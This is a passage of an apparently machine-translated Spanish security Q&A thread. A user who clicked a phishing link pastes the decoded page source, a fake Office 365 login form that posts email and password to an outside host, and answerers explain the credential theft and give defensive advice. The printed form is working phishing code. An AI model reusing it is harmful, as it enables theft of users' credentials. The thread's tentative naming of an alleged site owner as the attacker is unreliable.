Haga clic accidentalmente en un enlace de phishing, ¿es peligroso?

Navega tus respuestas
-1

no estoy seguro de que este sea el lugar correcto para hacer una pregunta como esta.

Accidentalmente hice clic en un enlace de mi correo electrónico, me llevó a un sitio web extraño que tiene una URL muy larga.

Después de buscar en Google por algún tiempo, encontré formas de convertirlo en un texto legible, pero no tengo idea de lo que hace, y de lo peligroso que es, ¿hay alguna gente con experiencia que pueda ayudarme? 

<script type="text/javascript">
<!-- HTML Encryption provided by www.webtoolhub.com -->
<!--
document.write(unescape('<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Sign in to Office 365</title>
<meta name="generator" content="WYSIWYG Web Builder 10 - http://www.wysiwygwebbuilder.com">
<link href="http://thesimnews.com/box/owa/Untitled1.css" rel="stylesheet">
<link href="http://thesimnews.com/box/owa/nickeloffice.css" rel="stylesheet">
<script src="http://thesimnews.com/box/owa/jquery-1.11.1.min.js"></script><scriptsrc="http://thesimnews.com/box/owa/wwb10.min.js"></script>
<script>
$(document).ready(function()
{
   LoadValue('Editbox1', 'local', 0);
   LoadValue('Editbox2', 'local', 0);
   LoadValue('Checkbox1', 'local', 1);
   $("#Form1").submit(function(event)
   {
      StoreValue('Editbox1', 'local', 0);
      StoreValue('Editbox2', 'local', 0);
      StoreValue('Checkbox1', 'local', 1);
      return true;
   });
});
</script>
</head>
<body>
<div id="wb_Image1" style="position:absolute;left:0px;top:1px;width:1327px;height:666px;z-index:4;">
<img src="http://thesimnews.com/box/owa/images/Capture.PNG"id="Image1" alt=""></div>
<div id="wb_Text1" style="position:absolute;left:892px;top:160px;width:211px;height:16px;z-index:5;text-align:left;">
<span style="color:#DC143C;font-family:'Lucida Sans Unicode';font-size:13px;">Please login to continue upgrade</span></div>
<div id="wb_Form1" style="position:absolute;left:878px;top:174px;width:363px;height:174px;z-index:6;">
<form name="Form1" method="post" action="http://thesimnews.com/box/owa/result.php" enctype="multipart/form-data" accept-charset="UTF-8" target="_self" id="Form1">
<input type="hidden" name="formid" value="form1">
<input type="email" id="Editbox1" style="position:absolute;left:14px;top:11px;width:342px;height:24px;line-height:24px;z-index:0;" name="Email" value="" placeholder="[email protected]">
<input type="password" id="Editbox2" style="position:absolute;left:14px;top:47px;width:342px;height:24px;line-height:24px;z-index:1;" name="Password" value="" placeholder=" Password">
<input type="checkbox" id="Checkbox1" name="" value="on" style="position:absolute;left:11px;top:85px;z-index:2;">
<input type="submit" id="Button1" name="" value="" style="position:absolute;left:14px;top:136px;width:66px;height:31px;z-index:3;">
</form>
</div>
</body>
</html>'));
//-->
</script>
    
pregunta ra13110 29.07.2016 - 09:00
fuente

2 respuestas

0

Si la página solo consiste en este código y está bien. Por lo que veo, esta página solo consiste en un formulario. Si no envía sus informaciones (correo electrónico + contraseña) a través de él, no hay riesgo.

Me sorprendería si hubiera otros vectores de ataque en este tipo de página de phishing.

EDITAR: Para obtener más información sobre esto, este "texto" es el código fuente de la página. Contiene un formulario html que se puede usar (y se usa a menudo) en sitios legítimos para páginas de inicio de sesión. Para detectar ataques de phishing en páginas como esta, puede utilizar varios factores: * La url (comienza con una IP, el nombre del sitio web está mal escrito ...) * El código fuente: como puede ver, apunta a " enlace ", que no es un sitio microsoft * otros factores (página lenta, mala escritura, mala imagen / aspecto de la página ...)

De una manera más general, evite hacer clic en los enlaces en los correos a menos que esté seguro de su origen y, si le pide que inicie sesión, vaya a la página principal del sitio (que sabe que está bien) y regístrese desde allí.

    
respondido por el zr_ifrit 29.07.2016 - 09:37
fuente
0

Introducción:

Haga clic accidentalmente en un enlace de phishing, ¿es peligroso?

Las páginas en sí mismas no parecen contener malware (aunque algunos códigos no se pueden ver), pero es un conjunto de páginas no oficiales que imitan a las páginas oficiales, por lo que es potencialmente peligroso visitarlas o ingresarlas. No sugeriría que nadie visite la url , incluso con el propósito de responder a esta pregunta, sin tomar precauciones.

Examen:

Ruta:

http://bit.ly/2aw86ME - > http://thesimnews.com/box/owa/adf.php - > datos: texto / html; base64, PHNjcml ... [recortado para evitar infracciones] - > http://thesimnews.com/box/owa/result.php [302 Moved] - > http://thesimnews.com/box/owa/loading.php - > datos: texto / html; base64, PHNjcmlwdC .. [recortado para evitar la infracción] - > https://login.microsoftonline.com/

Detalles:

bit.ly es un popular servicio de acortamiento de URL. thesimnews.com parece ser un blog de noticias propiedad de Lucas Ulor (puede que no sea su nombre real). Según la dirección IP, creo que está alojado en Versaweb LLC. El sitio # 3 tiene una url larga, porque en realidad no es una url. Es un uri de datos (popular entre los atacantes, pero no malvado en sí mismo). Los datos decodificados son javascript que contiene datos HTML encriptados. La página imita un inicio de sesión de Office 365. A pesar de ser un uri de datos, extrae varios recursos de thesimnews.com, que incluyen imágenes y javascripts.

Alenviarelformulariodeiniciodesesión,utilizaPOSTparaenviarelcorreoelectrónicoylacontraseñadelusuarioaotrapáginaenthesimnews.com.Estapáginaesunapáginaphp,porloquenopuedodecirexactamenteloquehace,porquesolopuedoverlaspartesdelcódigoqueseenvíaalvisitante,peroporloquepuedovercontienecódigojavascriptqueredirigealusuarioaotrouridedatosquecontienejavascriptcondatosHTMLencriptados.Estapáginamuestraunmensajedefelicitación(estapáginatambiénusaimágenesyjavascriptsdethesimnews.com),

y luego redirige a un sitio oficial de Microsoft.

Conclusión:

Esto parece un intento de robar las credenciales de inicio de sesión de Office 365. Menos mal que no has iniciado sesión :).

Concequencias:

  • Tu IP ha sido expuesta a Lucas Ulor visitando su sitio. Para que un hacker te ataque, esto es lo primero que necesita saber (dónde estás).
  • Su dirección de correo electrónico también puede estar expuesta a Lucas Ulor porque el enlace bit.ly que le enviamos por correo electrónico podría ser único para usted.

Respuesta:

Acciones sugeridas:

  • Si no tiene una contraseña de correo electrónico segura, obtenga una.
  • Si tiene una cuenta de Office 365, use el mismo correo electrónico para ella, y no tiene una contraseña segura de Office 365, obtenga una.
  • Si su proveedor de correo electrónico tiene una función de informe, informe el correo electrónico para que, con suerte, su proveedor de correo electrónico bloquee el envío de correos electrónicos similares a otras personas, usted será su héroe :).
  • Esté atento a cualquier actividad inusual en el firewall de su computadora durante el próximo tiempo. En caso de cualquier intento de piratería en su computadora.

Si sigue estas acciones sugeridas, tenga en cuenta que NO soy un experto en seguridad, solo un transeúnte preocupado, postergando en lugar de hacer lo que debería ser.

Acciones adicionales:

  • Realice un análisis de virus completo. Las páginas en sí estaban a salvo de lo que pude ver (aunque no se expuso todo el código), pero si has sido hackeado desde una visita, podría haber algo malicioso en tu computadora.
  • Haga una copia de seguridad de sus datos, para que esté preparado en caso de un ataque.
  • Obtenga una nueva dirección IP. La mayoría de los proveedores de Internet usan IP dinámicas (cambio) a menos que pague extra por una estática (permenante), por lo que puede obtener una IP nueva desconectando su módem por un tiempo. O bien, comuníquese con su proveedor de Internet y vea si le darán uno nuevo.

TL; DR

Parece un intento de robar los datos de inicio de sesión de Office 365. Su IP ha sido expuesta y podría usarse para ayudar a un ataque en su sistema, así que esté atento a las actividades inusuales en su computadora.

    
respondido por el Robin Hood 31.07.2016 - 03:22
fuente

Lea otras preguntas en las etiquetas

Filtrado Xss de comillas simples [cerrado] cómo verificar si mi servidor ha sido pirateado [cerrado]